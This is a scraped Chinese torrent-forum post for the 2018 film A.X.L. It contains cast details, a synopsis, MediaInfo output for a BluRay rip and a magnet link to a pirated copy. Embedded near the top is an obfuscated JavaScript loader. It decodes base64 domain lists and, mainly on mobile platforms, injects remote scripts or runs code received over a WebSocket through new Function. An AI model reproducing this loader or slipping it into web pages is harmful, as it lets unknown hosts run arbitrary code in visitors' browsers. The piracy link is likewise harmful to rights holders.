机器猛犬[英语音轨/中文字幕].迅雷下载.A.X.L.2018.1080p.BluRay.x264.DTS-PTH 7.08GB

版主小s 1月前 178

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 机器猛犬 / 机动战犬(港) / 机器战犬(台) / AXL / Miles

◎片 名 A.X.L.

◎年 代 2018

◎产 地 美国

◎类 别 科幻 / 冒险

◎语 言 英语

◎上映日期 2018-08-24(美国)

◎IMDb链接 https://www.imdb.com/title/tt5709188/

◎豆瓣评分 4.5/10 (2198人评价)

◎豆瓣链接 https://movie.douban.com/subject/26919051/

◎片 长 100分钟

◎导 演 奥利弗·达利 Oliver Daly (id:1393401)

◎编 剧 奥利弗·达利 Oliver Daly (id:1393401)

◎演 员 亚历克斯·诺伊施泰特 Alex Neustaedter (id:1390838)

贝姬·戈麦斯 Becky G (id:1352172)

亚历克斯·马克尼科尔 Alex MacNicoll (id:1393405)

多米尼克·瑞恩斯 Dominic Rains (id:1220708)

托马斯·简 Thomas Jane (id:1031816)

卢·泰勒·普奇 Lou Taylor Pucci (id:1022749)

帕特里夏·德·莱昂 Patricia De Leon (id:1393404)

Niko Guardado Niko Guardado (id:1393403)

特德·麦金利 Ted McGinley (id:1124228)

玛德琳·贝塔尼 Madeline Bertani (id:1360893)

哈西·哈里森 Hassie Harrison (id:1356463)

Maggy Vick Maggy Vick (id:1393407)

萨姆·厄普顿 Sam Upton (id:1018718)

埃里克·艾特巴里 Eric Etebari (id:1036855)

乔纳森·坎普 Jonathan Camp (id:1328850)

Donnie Smith Donnie Smith (id:1194581)

阿什莉·吉普森 Ashley Gibson (id:1412682)

弗雷德·塔特西奥 Fred Tatasciore (id:1320585)

多里安·金 Dorian Kingi (id:1393402)

斯黛茜·阿伦·拉布 Stacey Arwen Raab (id:1391782)

多米尼克·韦德 Dominic Vedder (id:1393406)

Chris Verdugo Chris Verdugo (id:1393408)

杰瑞·迪里奥 Jerry DiLeo (id:1393409)

◎标 签 科幻 / 机械猛犬 / 机器猛犬 / 美国 / 电影 / 动作 / 2018 / 冒险

◎简 介

一个运气不佳的自行车手迈尔斯某天偶然发现一只先进、机器、军用的机器狗A.X.L.,其心脏是真狗的心脏,其他部位装备新一代人工智能。迈尔斯和AXL在日常交往中逐渐增进感情,而无赖军事科学家要不顾一切将AXL捉回,迈尔斯与他的梦中情人、足智多谋莎拉组队,为保护他的新朋友,踏上了一段史诗般的冒险旅程。

  1. General

  2. Unique ID : 318564818640166502224642529758618256674 (0xEFA95A3343C918961BEB31612F4F0522)

  3. Complete name : A.X.L.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.08 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate : 10.3 Mb/s

  9. Movie name : A.X.L.

  10. Encoded date : UTC 2021-06-24 04:35:02

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 38 min

  25. Bit rate : 8 701 kb/s

  26. Width : 1 920 pixels

  27. Height : 800 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.236

  36. Stream size : 5.99 GiB (85%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 38 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.04 GiB (15%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4610 (0x1202)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 28 min

  69. Bit rate : 40.4 kb/s

  70. Count of elements : 2233

  71. Stream size : 25.6 MiB (0%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4611 (0x1203)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 28 min

  85. Bit rate : 40.7 kb/s

  86. Count of elements : 2233

  87. Stream size : 25.7 MiB (0%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4612 (0x1204)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 28 min

  101. Bit rate : 21.4 kb/s

  102. Count of elements : 2233

  103. Stream size : 13.5 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4613 (0x1205)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 28 min

  117. Bit rate : 21.7 kb/s

  118. Count of elements : 2233

  119. Stream size : 13.7 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 28 min

  133. Bit rate : 38.4 kb/s

  134. Count of elements : 2420

  135. Stream size : 24.3 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:05:03.886 : Chapter 02

  144. 00:10:06.063 : Chapter 03

  145. 00:16:35.494 : Chapter 04

  146. 00:19:37.926 : Chapter 05

  147. 00:23:11.848 : Chapter 06

  148. 00:30:32.080 : Chapter 07

  149. 00:36:25.266 : Chapter 08

  150. 00:44:47.643 : Chapter 09

  151. 00:49:35.263 : Chapter 10

  152. 00:56:14.788 : Chapter 11

  153. 01:01:15.004 : Chapter 12

  154. 01:09:45.472 : Chapter 13

  155. 01:14:41.727 : Chapter 14

  156. 01:18:30.414 : Chapter 15

  157. 01:25:27.080 : Chapter 16




TAGS 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:CC18A443A2B1E514D6D30CA69268BCDEF8316349
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回